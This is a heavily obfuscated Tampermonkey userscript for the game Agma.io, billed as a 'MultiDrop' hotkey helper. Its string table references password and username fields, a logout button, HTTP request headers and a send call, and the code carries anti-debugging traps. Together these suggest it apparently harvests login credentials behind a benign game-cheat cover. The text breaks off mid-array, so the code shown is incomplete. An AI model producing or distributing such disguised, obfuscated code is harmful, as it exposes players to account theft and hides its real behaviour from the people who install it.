// ==UserScript==
// @name         Agma.io MultiDrop Script
// @namespace    http://tampermonkey.net/
// @version      2.0
// @description  Elevate your Agma.io gaming experience with the MultiDrop script for Tampermonkey! This script enables seamless activation of specific powers using a single keystroke, providing a streamlined and competitive edge.
// @author       DevAgma
// @match        *://agma.io/*
// @icon         https://www.google.com/s2/favicons?sz=64&domain=agma.io
// @license      GPL-3.0-or-later
// @run-at       document-start
// @grant        none
// ==/UserScript==
const _0x5d2eb6=_0x73d6;(function(_0x12f63d,_0x1638eb){const _0x25d532=_0x73d6,_0x3c1540=_0x12f63d();while(!![]){try{const _0x5a4897=-parseInt(_0x25d532(0x39f))/0x1*(parseInt(_0x25d532(0x241))/0x2)+parseInt(_0x25d532(0x2eb))/0x3+parseInt(_0x25d532(0x16c))/0x4+-parseInt(_0x25d532(0x133))/0x5*(parseInt(_0x25d532(0x45b))/0x6)+parseInt(_0x25d532(0x2b8))/0x7+parseInt(_0x25d532(0x412))/0x8*(parseInt(_0x25d532(0x2a4))/0x9)+-parseInt(_0x25d532(0x27b))/0xa*(parseInt(_0x25d532(0x33c))/0xb);if(_0x5a4897===_0x1638eb)break;else _0x3c1540['push'](_0x3c1540['shift']());}catch(_0x5f174b){_0x3c1540['push'](_0x3c1540['shift']());}}}(_0x1123,0xd6da5));function _0x34b1c3(_0xcdcded,_0x2bc1ca,_0x5efa30,_0x11a9de,_0x591d1a){return _0x5b16b7(_0x5efa30-0x388,_0xcdcded);}function _0x38a483(_0xca050c,_0x67a567,_0x5207f7,_0x232325,_0x5ba7ad){return _0x5b16b7(_0x67a567-0x233,_0x5207f7);}function _0x1b7dfa(_0x501e71,_0x1460b1,_0x15acab,_0x41e594,_0x56f4c1){return _0x5b16b7(_0x41e594-0x343,_0x501e71);}function _0x23fc6a(_0x1dc7bf,_0x5dfcb4,_0x2946d8,_0x536245,_0x41e740){return _0x5b16b7(_0x536245-0x3b,_0x1dc7bf);}!function(_0x2a411b,_0x2e5d2f){const _0x87fe9c=_0x73d6,_0xcb7576=_0x13383();for(;;){try{if(0x2e0dd==parseInt(_0x5b16b7(0x216,-0xcd))/0x1+-parseInt(_0x5b16b7(0x146,-0x11d))/0x2+-parseInt(_0x5b16b7(0x42d,0x777))/0x3*(-parseInt(_0x5b16b7(0x424,0x879))/0x4)+parseInt(_0x5b16b7(0x1fd,-0x25))/0x5+parseInt(_0x5b16b7(0x1de,0x632))/0x6*(parseInt(_0x5b16b7(0x171,0x47b))/0x7)+-parseInt(_0x5b16b7(0x30c,0x30))/0x8+-parseInt(_0x5b16b7(0x251,0x658))/0x9*(parseInt(_0x5b16b7(0x2f4,-0x193))/0xa))break;_0xcb7576[_0x87fe9c(0x468)](_0xcb7576[_0x87fe9c(0x2ad)]());}catch(_0x27decd){_0xcb7576[_0x87fe9c(0x468)](_0xcb7576[_0x87fe9c(0x2ad)]());}}}();function _0x73d6(_0x4b28d1,_0x2ab461){const _0x1123f6=_0x1123();return _0x73d6=function(_0x73d630,_0x423245){_0x73d630=_0x73d630-0xe0;let _0x368b03=_0x1123f6[_0x73d630];return _0x368b03;},_0x73d6(_0x4b28d1,_0x2ab461);}const _0x2d857c=(function(){let _0x4b1a50=!![];return function(_0x56f3cc,_0x4b9b88){{const _0x2022da=_0x4b1a50?function(){if(_0x4b9b88){const _0x2db8d6=_0x4b9b88['apply'](_0x56f3cc,arguments);return _0x4b9b88=null,_0x2db8d6;}}:function(){};return _0x4b1a50=![],_0x2022da;}};}()),_0x51fa49=_0x2d857c(this,function(){const _0x271706=_0x73d6;return _0x51fa49[_0x271706(0x315)]()['search']('(((.+)+)+)+$')[_0x271706(0x315)]()[_0x271706(0x222)](_0x51fa49)[_0x271706(0x129)](_0x271706(0x44e));});function _0x13383(){const _0x4f207c=_0x73d6,_0x3e24eb=[_0x4f207c(0x276),_0x4f207c(0x368),_0x4f207c(0x3c1),'KKPLY',_0x4f207c(0x403),_0x4f207c(0x109),_0x4f207c(0x35d),_0x4f207c(0x41f),_0x4f207c(0x458),'EYqnc',_0x4f207c(0x467),_0x4f207c(0xf4),_0x4f207c(0x1ad),_0x4f207c(0x419),_0x4f207c(0x2da),_0x4f207c(0x246),'ZwTmd',_0x4f207c(0x335),_0x4f207c(0x2ef),_0x4f207c(0x3bc),_0x4f207c(0x427),_0x4f207c(0x26b),_0x4f207c(0x2af),_0x4f207c(0x426),_0x4f207c(0x2fb),'qCTfO','Setti','xMwCg',_0x4f207c(0x2c9),_0x4f207c(0x1f8),'TJcwL',_0x4f207c(0x443),_0x4f207c(0x3c9),_0x4f207c(0x243),_0x4f207c(0x22b),'DpLHT','pSLcG','URCRK','pliLq','xrfmN',_0x4f207c(0x1e5),'ObbRw',_0x4f207c(0x2c5),_0x4f207c(0x3ca),_0x4f207c(0x336),_0x4f207c(0x175),_0x4f207c(0x146),_0x4f207c(0x3ea),_0x4f207c(0x12d),_0x4f207c(0x145),_0x4f207c(0x43e),'tqFgT',_0x4f207c(0x17d),_0x4f207c(0x372),_0x4f207c(0x23e),_0x4f207c(0x309),'myCvV',_0x4f207c(0x118),_0x4f207c(0x225),'ame',_0x4f207c(0x21f),_0x4f207c(0x2a0),'getIt',_0x4f207c(0xfa),_0x4f207c(0x255),'gify',_0x4f207c(0xe4),'kYpwb',_0x4f207c(0x1fd),_0x4f207c(0x1d2),_0x4f207c(0x205),_0x4f207c(0x3aa),_0x4f207c(0x3db),_0x4f207c(0xfc),'}.con',_0x4f207c(0x434),_0x4f207c(0x34d),_0x4f207c(0x404),_0x4f207c(0x374),_0x4f207c(0x1b2),_0x4f207c(0x3fa),_0x4f207c(0xf6),_0x4f207c(0x166),_0x4f207c(0x3ee),_0x4f207c(0x18e),_0x4f207c(0x3a1),_0x4f207c(0x1b7),_0x4f207c(0x342),_0x4f207c(0x1cd),_0x4f207c(0xe9),_0x4f207c(0x2f3),'lick','r\x22\x20ty',_0x4f207c(0x266),_0x4f207c(0x394),_0x4f207c(0x3b3),_0x4f207c(0x169),'VQxEI',_0x4f207c(0x2d4),_0x4f207c(0x114),_0x4f207c(0x333),_0x4f207c(0x30c),'tJVEr',_0x4f207c(0x223),_0x4f207c(0x311),_0x4f207c(0x413),_0x4f207c(0x184),'HXCRa',_0x4f207c(0x399),_0x4f207c(0x3b0),_0x4f207c(0x2d5),_0x4f207c(0x35a),_0x4f207c(0x32d),'hkzyn',_0x4f207c(0x303),'jSQbr',_0x4f207c(0x351),_0x4f207c(0x2c7),_0x4f207c(0x414),'CEllV',_0x4f207c(0x20d),_0x4f207c(0x2a6),_0x4f207c(0x21d),_0x4f207c(0x1da),'vqTTm',_0x4f207c(0x178),_0x4f207c(0x37f),_0x4f207c(0x452),_0x4f207c(0x2cd),'nnyig',_0x4f207c(0x10a),'jKdvZ','SaXKp',_0x4f207c(0x352),'</lab','MuqoU',_0x4f207c(0x115),_0x4f207c(0x2a9),_0x4f207c(0x2ff),'YLfbQ',_0x4f207c(0x176),_0x4f207c(0x2f5),_0x4f207c(0x218),_0x4f207c(0x2f4),_0x4f207c(0x1ce),_0x4f207c(0x269),_0x4f207c(0x450),'Nqrox','OORwU',_0x4f207c(0x361),'{}.co',_0x4f207c(0x354),'uXKnk',_0x4f207c(0x445),_0x4f207c(0x174),'mjciJ',_0x4f207c(0x3e6),_0x4f207c(0x416),_0x4f207c(0x43b),_0x4f207c(0x26f),_0x4f207c(0x326),_0x4f207c(0x2f7),'Tucmh',_0x4f207c(0x2ec),_0x4f207c(0x460),_0x4f207c(0x379),_0x4f207c(0x124),_0x4f207c(0x214),_0x4f207c(0x3ae),_0x4f207c(0x304),_0x4f207c(0x377),_0x4f207c(0x29b),'hyOOM',_0x4f207c(0x181),_0x4f207c(0x285),_0x4f207c(0x131),_0x4f207c(0x183),_0x4f207c(0x295),_0x4f207c(0x2d6),_0x4f207c(0x2e3),_0x4f207c(0x117),_0x4f207c(0x3ce),_0x4f207c(0x332),'FrnFy',_0x4f207c(0x36e),_0x4f207c(0x22d),_0x4f207c(0x360),_0x4f207c(0x3e4),'DKbky',_0x4f207c(0x35e),_0x4f207c(0x248),_0x4f207c(0x1dc),_0x4f207c(0xfe),'https',_0x4f207c(0x3cb),_0x4f207c(0x28d),_0x4f207c(0x14d),_0x4f207c(0x3ff),_0x4f207c(0x365),'bgOTK',_0x4f207c(0x3f0),_0x4f207c(0x23b),_0x4f207c(0x3a9),_0x4f207c(0x3fe),_0x4f207c(0x40f),'wNrgJ',_0x4f207c(0x1de),_0x4f207c(0x3b4),'JrsUl','qtzqy',_0x4f207c(0x331),_0x4f207c(0x3d7),_0x4f207c(0x167),'bPFwO','ZxbfO','WyPqO','VFucW',_0x4f207c(0x26d),_0x4f207c(0x386),_0x4f207c(0x2fa),_0x4f207c(0x153),_0x4f207c(0x395),'#sett','cyMMZ','JYiyk','AIXQp',_0x4f207c(0x13d),'kNiUH',_0x4f207c(0x3e0),_0x4f207c(0x34e),_0x4f207c(0xe5),'VCTlK',_0x4f207c(0x423),_0x4f207c(0x220),_0x4f207c(0x161),_0x4f207c(0x187),_0x4f207c(0x341),_0x4f207c(0x33e),'AMxmg',_0x4f207c(0x24d),_0x4f207c(0x2e8),'*(?:[','mhYbW',_0x4f207c(0x1e7),_0x4f207c(0x37e),_0x4f207c(0x310),'NCfSu',_0x4f207c(0x385),_0x4f207c(0x1dd),_0x4f207c(0x20c),'ing',_0x4f207c(0x31b),_0x4f207c(0x256),_0x4f207c(0x2dd),'ITIdI',_0x4f207c(0x448),'tOCBr',_0x4f207c(0x3bb),'etLKT','dDbyV',_0x4f207c(0x2ac),_0x4f207c(0x3df),_0x4f207c(0x14c),_0x4f207c(0x2ea),_0x4f207c(0x1fa),_0x4f207c(0x1c7),_0x4f207c(0x1a1),'ORsnV',_0x4f207c(0x402),'wxBEW',_0x4f207c(0x11b),'zaDzP','DYQRV',_0x4f207c(0x275),_0x4f207c(0x408),_0x4f207c(0x177),_0x4f207c(0x1c1),_0x4f207c(0x32f),_0x4f207c(0x15b),'38370xnNBKs','pyHZt','wxzJB',_0x4f207c(0x15a),'YDGTW','state',_0x4f207c(0x2b7),'huTfJ',_0x4f207c(0x1ed),_0x4f207c(0x3a5),_0x4f207c(0x155),'OemTD','WPnaw','toStr',_0x4f207c(0x371),'roJFj',_0x4f207c(0x108),_0x4f207c(0x1c4),'uEUFT',_0x4f207c(0x13e),_0x4f207c(0x39a),_0x4f207c(0x440),_0x4f207c(0x18d),_0x4f207c(0x1a2),'css',_0x4f207c(0x1a4),'ZaJKp',_0x4f207c(0x38d),_0x4f207c(0x208),_0x4f207c(0x263),'VDcCW',_0x4f207c(0x388),'>\x20Gol',_0x4f207c(0x3a4),_0x4f207c(0x262),'ZSyMc',_0x4f207c(0xfd),_0x4f207c(0x3c8),_0x4f207c(0x3d4),'eNaKE',_0x4f207c(0x31c),_0x4f207c(0x21a),'bYpfF','4522cWVTxC',_0x4f207c(0x410),'EKuvy','wJwHO',_0x4f207c(0x369),_0x4f207c(0x324),_0x4f207c(0x1b8),_0x4f207c(0x15f),_0x4f207c(0x14a),_0x4f207c(0x330),_0x4f207c(0x17c),_0x4f207c(0x2c1),_0x4f207c(0x19c),'jPjdm','xBiJB',_0x4f207c(0x227),_0x4f207c(0x381),_0x4f207c(0x337),_0x4f207c(0x19b),_0x4f207c(0xff),'kwzNR',_0x4f207c(0x396),_0x4f207c(0x454),_0x4f207c(0x3de),_0x4f207c(0x151),_0x4f207c(0x2dc),_0x4f207c(0x424),'Dskso','PZsDL',_0x4f207c(0x125),_0x4f207c(0x22e),_0x4f207c(0x3b8),'check',_0x4f207c(0x203),_0x4f207c(0x1c6),_0x4f207c(0x1d6),_0x4f207c(0x439),'UlKMR',_0x4f207c(0x221),_0x4f207c(0x465),_0x4f207c(0x362),_0x4f207c(0x2ab),_0x4f207c(0x286),_0x4f207c(0x1ae),_0x4f207c(0x1e4),_0x4f207c(0x23c),_0x4f207c(0x1a0),_0x4f207c(0x405),_0x4f207c(0x39c),_0x4f207c(0x462),_0x4f207c(0x358),_0x4f207c(0x271),_0x4f207c(0x32a),'lays',_0x4f207c(0x11c),_0x4f207c(0x130),_0x4f207c(0x345),_0x4f207c(0x1b6),_0x4f207c(0x3f2),_0x4f207c(0x35f),_0x4f207c(0x12e),_0x4f207c(0x186),_0x4f207c(0x3b6),_0x4f207c(0x290),'iTHZC',_0x4f207c(0x38a),_0x4f207c(0x2a7),_0x4f207c(0xe3),_0x4f207c(0x35c),'sXXmT',_0x4f207c(0x45d),_0x4f207c(0x2b2),_0x4f207c(0x3b1),_0x4f207c(0x245),_0x4f207c(0x160),_0x4f207c(0x40a),'Pkort',_0x4f207c(0x3bf),'eesZD',_0x4f207c(0x2e1),_0x4f207c(0xec),_0x4f207c(0x42d),_0x4f207c(0x437),'PExpQ',_0x4f207c(0x23f),_0x4f207c(0x267),'WViIw','PTDog',_0x4f207c(0x139),'HenqY',_0x4f207c(0x364),_0x4f207c(0x200),_0x4f207c(0x3a8),_0x4f207c(0x401),_0x4f207c(0x137),_0x4f207c(0x257),_0x4f207c(0x10e),'jnmrY',_0x4f207c(0x162),_0x4f207c(0x463),_0x4f207c(0x306),_0x4f207c(0x2c0),_0x4f207c(0x3cd),_0x4f207c(0x10f),_0x4f207c(0x3f4),'tbuJB',_0x4f207c(0x3c0),_0x4f207c(0x37c),_0x4f207c(0x441),_0x4f207c(0x446),_0x4f207c(0x3f8),'IiIta',_0x4f207c(0x1f9),'mFNGu',_0x4f207c(0x31a),_0x4f207c(0xfb),_0x4f207c(0x456),'NcRgx',_0x4f207c(0x1d9),_0x4f207c(0x442),_0x4f207c(0x348),_0x4f207c(0x3fb),_0x4f207c(0x211),_0x4f207c(0x1be),_0x4f207c(0x210),'bxTSe','JtaaY',_0x4f207c(0x170),'xGcpM',_0x4f207c(0x1bd),_0x4f207c(0x34c),_0x4f207c(0x3f3),_0x4f207c(0x2e5),_0x4f207c(0x3a2),_0x4f207c(0x113),_0x4f207c(0x2df),'mAsjZ',_0x4f207c(0x32b),'lWjxw',_0x4f207c(0x444),_0x4f207c(0x46c),'push',_0x4f207c(0x17e),_0x4f207c(0x12c),_0x4f207c(0x264),_0x4f207c(0x274),_0x4f207c(0x104),'0-9a-','gbPGz',_0x4f207c(0x254),_0x4f207c(0x359),_0x4f207c(0x3f9),_0x4f207c(0x425),_0x4f207c(0x291),_0x4f207c(0x179),_0x4f207c(0x338),_0x4f207c(0x339),_0x4f207c(0x196),_0x4f207c(0x3fc),_0x4f207c(0x3d5),_0x4f207c(0x106),_0x4f207c(0x10b),_0x4f207c(0x209),_0x4f207c(0x41e),'pmuhF',_0x4f207c(0x22a),'fZxyj',_0x4f207c(0x36b),_0x4f207c(0x1e1),'zisyu',_0x4f207c(0x347),_0x4f207c(0x2c6),_0x4f207c(0x1af),'hJwsj',_0x4f207c(0x39d),_0x4f207c(0x3d8),_0x4f207c(0x27e),_0x4f207c(0x1a9),_0x4f207c(0x2bb),'SZMIK','conte',_0x4f207c(0x229),'pcvdg',_0x4f207c(0x18a),_0x4f207c(0x2e4),_0x4f207c(0x231),'#logo',_0x4f207c(0x3ed),_0x4f207c(0x15c),'xd','VjsLY',_0x4f207c(0x156),_0x4f207c(0x436),_0x4f207c(0x41b),_0x4f207c(0x376),_0x4f207c(0x31d),_0x4f207c(0x195),'beIzO',_0x4f207c(0x3c7),_0x4f207c(0x1ec),_0x4f207c(0x251),_0x4f207c(0x45f),_0x4f207c(0x1c5),'kuFdY',_0x4f207c(0x3cc),_0x4f207c(0x121),_0x4f207c(0xf1),'ueOKB','NYsEO',_0x4f207c(0x382),_0x4f207c(0x294),_0x4f207c(0x301),_0x4f207c(0x11a),_0x4f207c(0x428),_0x4f207c(0x258),'wQEiY',_0x4f207c(0x142),_0x4f207c(0x29a),_0x4f207c(0x16f),_0x4f207c(0x22f),_0x4f207c(0x13b),_0x4f207c(0x16a),'MoOJi',_0x4f207c(0x1b4),'207ZPQDSl',_0x4f207c(0x357),'SSNMa','UMqfK',_0x4f207c(0x2e0),_0x4f207c(0x284),_0x4f207c(0x247),'funct',_0x4f207c(0x2cb),_0x4f207c(0x26c),_0x4f207c(0x317),_0x4f207c(0x2be),_0x4f207c(0x1c3),_0x4f207c(0x1f4),'BFERx',_0x4f207c(0x1ac),'WGLBl',_0x4f207c(0x44b),_0x4f207c(0x281),_0x4f207c(0x13f),_0x4f207c(0x453),_0x4f207c(0x261),_0x4f207c(0x1a5),_0x4f207c(0xeb),_0x4f207c(0x296),_0x4f207c(0x1f5),'warn',_0x4f207c(0x260),'n\x20thi',_0x4f207c(0x2a8),_0x4f207c(0x140),_0x4f207c(0x2b5),_0x4f207c(0x103),_0x4f207c(0x20f),_0x4f207c(0x355),_0x4f207c(0x10d),'FCIAl',_0x4f207c(0x344),_0x4f207c(0x3be),_0x4f207c(0x2ce),_0x4f207c(0x147),_0x4f207c(0x3a3),_0x4f207c(0x38f),_0x4f207c(0x190),_0x4f207c(0x1cb),_0x4f207c(0x43f),_0x4f207c(0x46d),_0x4f207c(0xea),_0x4f207c(0x1c8),_0x4f207c(0x36c),_0x4f207c(0x280),_0x4f207c(0x3e5),'ntent','imaXr',_0x4f207c(0x46a),_0x4f207c(0x3f7),_0x4f207c(0x188),'n()\x20',_0x4f207c(0x22c),_0x4f207c(0x102),'n()\x20{',_0x4f207c(0x18b),_0x4f207c(0x26e),_0x4f207c(0x33f),_0x4f207c(0xf7),'byEqy',_0x4f207c(0x461),'BsZmy','BymxK',_0x4f207c(0x212),_0x4f207c(0x44d),_0x4f207c(0x2d7),'SFPac',_0x4f207c(0x314),_0x4f207c(0x31e),'hyegI',_0x4f207c(0x157),_0x4f207c(0x24c),_0x4f207c(0x3e3),'iwfWl',_0x4f207c(0x42a),_0x4f207c(0x466),_0x4f207c(0x120),'DSSQf',_0x4f207c(0x297),_0x4f207c(0x107),_0x4f207c(0x327),_0x4f207c(0x28e),_0x4f207c(0x43c),_0x4f207c(0x1e3),_0x4f207c(0x112),_0x4f207c(0xe0),_0x4f207c(0x122),_0x4f207c(0xe1),_0x4f207c(0x3f5),_0x4f207c(0x25f),'count',_0x4f207c(0x321),_0x4f207c(0x38c),_0x4f207c(0xef),'DuSBd','qMRVQ',_0x4f207c(0x459),_0x4f207c(0x1b3),'vFgqf',_0x4f207c(0x343),_0x4f207c(0x45c),_0x4f207c(0x17b),_0x4f207c(0x27a),_0x4f207c(0x135),_0x4f207c(0x3ab),'IKpKb','piriW','iWWIC','wiOUi',_0x4f207c(0x366),_0x4f207c(0x277),_0x4f207c(0x328),_0x4f207c(0x1f1),_0x4f207c(0x2b6),_0x4f207c(0x206),'catio','SuJiu',_0x4f207c(0x2fd),_0x4f207c(0x1f2),_0x4f207c(0x10c),_0x4f207c(0x237),'sLIKx',_0x4f207c(0x283),_0x4f207c(0x383),_0x4f207c(0x2f2),'RITfa',_0x4f207c(0x2de),_0x4f207c(0x373),_0x4f207c(0x182),_0x4f207c(0x1e8),_0x4f207c(0x2c2),_0x4f207c(0x159),_0x4f207c(0x2e9),_0x4f207c(0x421),_0x4f207c(0x384),_0x4f207c(0x3b2),_0x4f207c(0x219),_0x4f207c(0x189),_0x4f207c(0x11e),_0x4f207c(0x2bf),'VDvpM','MXxWt','Uyoeg',_0x4f207c(0x2d1),_0x4f207c(0x1ef),_0x4f207c(0x1d5),_0x4f207c(0x194),_0x4f207c(0x12a),'swxri',_0x4f207c(0x143),_0x4f207c(0x2a5),_0x4f207c(0x42f),_0x4f207c(0x2e2),_0x4f207c(0x1c2),'QsJbp',_0x4f207c(0x1d1),'cdrct',_0x4f207c(0x1ea),_0x4f207c(0x40b),'rQspC',_0x4f207c(0x1ff),_0x4f207c(0x1a3),'dius',_0x4f207c(0x3c2),_0x4f207c(0x38e),_0x4f207c(0x226),_0x4f207c(0xf9),'sULpI',_0x4f207c(0x398),_0x4f207c(0x201),_0x4f207c(0x380),_0x4f207c(0x224),_0x4f207c(0x14b),_0x4f207c(0x2cf),'JZlnK','yzOKH','EGdfT',_0x4f207c(0x1e6),_0x4f207c(0x21c),'wDcAF',_0x4f207c(0x397),_0x4f207c(0xe8),_0x4f207c(0x292),_0x4f207c(0x26a),_0x4f207c(0x3ad),_0x4f207c(0x34f),'RZMvf','OwAmd',_0x4f207c(0x2c4),_0x4f207c(0x1b1),_0x4f207c(0x28a),'HAYAh',_0x4f207c(0x272),_0x4f207c(0x1cc),_0x4f207c(0x127),_0x4f207c(0x268),_0x4f207c(0x370),'YoBFY',_0x4f207c(0x1d7),_0x4f207c(0xf0),_0x4f207c(0x3f6),'KLneW',_0x4f207c(0x2ee),_0x4f207c(0x2a1),_0x4f207c(0x2b9),_0x4f207c(0x24e),_0x4f207c(0x20e),_0x4f207c(0x110),_0x4f207c(0x15e),_0x4f207c(0x42b),_0x4f207c(0x265),_0x4f207c(0x207),_0x4f207c(0x1bc),_0x4f207c(0x259),_0x4f207c(0x438),_0x4f207c(0x3eb),_0x4f207c(0x3fd),'cljKy',_0x4f207c(0x1fc),_0x4f207c(0x2d0),'rihCS',_0x4f207c(0x3c3),_0x4f207c(0x346),_0x4f207c(0x387),'lBODe',_0x4f207c(0xe7),_0x4f207c(0x3d9),_0x4f207c(0x29f),'bNJZu',_0x4f207c(0x253),'ks/11','wxEvt',_0x4f207c(0x1e0),_0x4f207c(0x30b),_0x4f207c(0x165),_0x4f207c(0x2f8),'aZivC',_0x4f207c(0x45e),'RcKDe',_0x4f207c(0x228),'EEkxC',_0x4f207c(0x43d),_0x4f207c(0x1f7),'OcVAk',_0x4f207c(0x44a),_0x4f207c(0x202),_0x4f207c(0x2ca),'zAiVp',_0x4f207c(0x252),_0x4f207c(0x29d),_0x4f207c(0x11d),'zA-Z_','ting\x22',_0x4f207c(0x119),_0x4f207c(0x313),_0x4f207c(0x3e7),'kxxCf',_0x4f207c(0x298),_0x4f207c(0xe6),_0x4f207c(0x36d),_0x4f207c(0x150),'type','igKqz','vSQgZ',_0x4f207c(0x447),_0x4f207c(0x132),_0x4f207c(0x320),'_3487','sQDSA','gIjZV',_0x4f207c(0x1f3),'vjAdU',_0x4f207c(0x451),'proto',_0x4f207c(0x180),'ZNgpW',_0x4f207c(0x2b1),_0x4f207c(0x1db),_0x4f207c(0x1eb),_0x4f207c(0x19a),_0x4f207c(0x2b0),_0x4f207c(0x14f),'nput\x20',_0x4f207c(0x21e),_0x4f207c(0x40e),'xxknp',_0x4f207c(0x20b),_0x4f207c(0x250),_0x4f207c(0x136),_0x4f207c(0x289),_0x4f207c(0x44c),_0x4f207c(0x30a),_0x4f207c(0x1cf),_0x4f207c(0x3c5),_0x4f207c(0x3a7),_0x4f207c(0x17a),_0x4f207c(0x1a7),_0x4f207c(0x32e),_0x4f207c(0x1b9),_0x4f207c(0x3dc),_0x4f207c(0x409),_0x4f207c(0x318),_0x4f207c(0x3af),'XTBSl',_0x4f207c(0x144),'MfiuP',_0x4f207c(0x45a),_0x4f207c(0xed),'lKKZZ',_0x4f207c(0x192),'iZSZK',_0x4f207c(0x3e8),'wPobO',_0x4f207c(0x367),_0x4f207c(0x16b),_0x4f207c(0x316),_0x4f207c(0x12f),_0x4f207c(0x244),_0x4f207c(0x2d8),_0x4f207c(0x305),_0x4f207c(0x3c4),_0x4f207c(0x217),_0x4f207c(0x36a),_0x4f207c(0x173),_0x4f207c(0x378),_0x4f207c(0x3b9),_0x4f207c(0x1d8),_0x4f207c(0x25a),'qnJdW','MMhrn',_0x4f207c(0x406),'AdBGa',_0x4f207c(0x3e1),'luCvH',_0x4f207c(0x288),_0x4f207c(0x171),_0x4f207c(0x2ba),'YzLxh',_0x4f207c(0x319),_0x4f207c(0x40c),_0x4f207c(0x391),_0x4f207c(0x1d0),_0x4f207c(0x2bd),_0x4f207c(0x21b),_0x4f207c(0x191),_0x4f207c(0x1aa),_0x4f207c(0x39b),_0x4f207c(0x12b),_0x4f207c(0x19d),_0x4f207c(0x1d4),_0x4f207c(0x312),_0x4f207c(0xf5),_0x4f207c(0x449),_0x4f207c(0x300),'mexIf','nCNVE',_0x4f207c(0xf3),_0x4f207c(0x239),_0x4f207c(0x2c8),_0x4f207c(0x2e7),_0x4f207c(0x197),_0x4f207c(0x242),_0x4f207c(0x2cc),_0x4f207c(0x353),_0x4f207c(0x422),_0x4f207c(0x100),_0x4f207c(0x28c),_0x4f207c(0x2b3),_0x4f207c(0x111),'ZHqKn',_0x4f207c(0x204),_0x4f207c(0x1e9),_0x4f207c(0x2c3),_0x4f207c(0xe2),_0x4f207c(0x1f0),'IBdGP','xddd','qPlWS',_0x4f207c(0x213),_0x4f207c(0x431),_0x4f207c(0x158),_0x4f207c(0x33a),_0x4f207c(0x1ca),_0x4f207c(0x432),'YDcuG',_0x4f207c(0x417),_0x4f207c(0x199),_0x4f207c(0x3b5),':chec',_0x4f207c(0x455),_0x4f207c(0x279),_0x4f207c(0x3a0),'iuCeB',_0x4f207c(0x302),'hUHNg',_0x4f207c(0x40d),_0x4f207c(0x1ab),'KLdnS',_0x4f207c(0x1f6),'Iqjvb',_0x4f207c(0x469),_0x4f207c(0x3d1),_0x4f207c(0x123),_0x4f207c(0x308)];return(_0x13383=function(){return _0x3e24eb;})();}_0x51fa49();function _0x1123(){const _0x324d71=['ScrollLock','F10','#over','wIrpH','heckb','uhntk','mouseover','eyaWw','Ypphd','3497x','JWsIZ','dDrTu','string','call','uqvPL','IRkyD','LhGqd','Speed','mjVRO','log','struc','ucNAo','Xcadd','fLxaB','ete','Insert','dqZnO','goldF','OlkuH','jdNUR','nyBPz','IkjKZ','atflh','fNiUB','uDFvM','inclu','zNUKL','translate(-50%,\x2090%)','wXjCG','YimJZ','nstru','Etnas','name','Home','qhssu','xFtkv','displ','eqJAk','css','Multikey','cWNUl','position','oCNHn','yBltm','clear','licke','GHODT','_text','block','ggkow','oLlTB','PJsvI','Zlzhk','antiRec','ObzhI','Invalid\x20key','NKvlS','LJYYu','UQJMa','AeTqM','multiple','wmakS','hotkey','F12','ZqTyv','OHtXT','$]*)','zIsnA','UgpHx','TBtwM','MLphh','terva','jffMs','tAbXl','rgb(255,\x200,\x200)','287bjwCeE','__pro','LIIpB','info','GSTWn','LGrYI','Tmihu','getItem','LiyiN','GJxnl','ojTPL','SqyoR','addEv','cursor','daIXg','b3,.r','fzzQn','vwyUv','mPKnG','oZTRy','iv>','dFlic','kBXQa','JkkWp','stateObject','qJXte','AlSAU','Multi\x20turned\x20ON','Objec','abDws','#level','CzWNg','DwjiV','MUaZp','ekhIP','TmtGS','ACImy','oXsop','MbcNX','355px','LRKzR','Idejs','HxOPS','WeFJD','ZnjuG','bSeZe','e-set','tiVYI','green','dispatchEvent','OOTEw','virus','Checkbox\x20is\x20not\x20checked.\x20Set\x20to\x20false.','wBYhl','vPCZF','Content-type','tlSuY','entLi','#mega','Windows','nbtPn','LimQi','top','mfnVn','tTZqC','wdDoY','oDOnY','Shield','\x22retu','SxVyq','ingTa','DWYVB','nFPAf','Lfikv','debugger','eOCgE','gHtYD','counter','XmHkO','EiryI','red','HHXyZ','warn','pcsjZ','prsl9','vZfwF','CJXVd','CTZvc','uIUSo','KEQSO','el><i','fTYAM','LWRGJ','nGwAo','7IB7n','DxSvV','qpsgS','16px','tvrIl','jfwYf','fIrKF','wPcal','gger','zpIxM','Checkbox\x20is\x20checked.\x20Set\x20to\x20true.','UzZCU','#play','SaaSc','cBtiY','gUrEN','YgDDo','gEIwL','GZIhC','58769','Delete','639608rttUTe','IQBHO','remov','portal','MTVQG','SgaZs','setItem','pe=\x22c','#password','anjTf','2px\x20solid\x20black','_0x471451','HVBbj','Aldyo','Mothercell','WssRC','HtJZy','dGpqn','10603','AWbzR','nmUnH','BeotL','quest','315px','HTykI','nKjPw','#logoutBtn','57vGG','Multi','XaaEO','transform','COaCX','init','mothercell','error','25px','BhzdO','IuVEN','MGbcr','YjxBH','recspeed','trace','ZHQZB','Unenp','tion','iqFiA','excep','ZKVtx','NEldG','#pass','word','<span','822eysnpP','usern','retur','lFPCz','OxyVd','DIGZD','pKyzi','tor(\x22','(((.+)+)+)+$','Rec','appli','PHKbG','OkMpC','DOMCo','GdHWm','kdDRU','JkyCp','stringify','FbEns','rFpci','KCMMy','12lTTrhr','mGJWr','HfOmg','MeutR','oKDyP','LQdir','lol','send','YfHBS','80px','XlSXM','Msaeo','WxniN','push','ROJdk','zROsD','pointer','306660qbqaNb','szxAB','dXXRK','LrsDX','XLZUQ','xJaMM','86127QzTNwA','vOWkx','TbbSS','xPiYj','769928ExOSTX','gPFtw','ngs','xatnx','fHZNx','rChOu','assign','EOpgS','QqDuf','n\x20(fu','className','sOIQd','HnBzE','zpAhU','pqmGo','mIBUG','hasOwnProperty','phone','beEHI','el><b','\x5c+\x5c+\x20','ZJynC','vUmmo','kTSOU','xUMUR','createElement','ilGvA','VjwHq','bJLJw','label','nbgCN','XQTrL','=\x22rol','NahxT','ksPvY','TniBV','IMVcb','rWUai','EZdmk','rhPoy','GNiHU','input','jRyZy','SGPol','><lab','fssom','Mul-mothercl','rMrVd','36yNfBtL','jdVQq','pVBQg','click','while','is\x22)(','KEwdG','Mul-Pellet\x20Amount:\x20','NkaLX','LRKKd','LpVhn','qlMma','bBaRc','MfwZP','setRequestHeader','PwWqA','Shift','search','Nmddp','setIn','chain','odcqz','YJQkK','RMyLE','ThBMC','pcmwY','eAttr','1315685RakWUi','gray','bUqeF','cXDxO','jiiAs','change','ndbSs','console','wnytb','40px','OdEqV','zfbVi','JmhRV','ked','repeat','kzsVC','bSlWP','quPxP','PjjBu','YAOLI','UYLby','antiFreeze','textAlign','hmVfa','zAJIM','mfpqv','TKAkO','20px','nJMHS','AWTiF','LjjhE','border','jKDYX','textContent',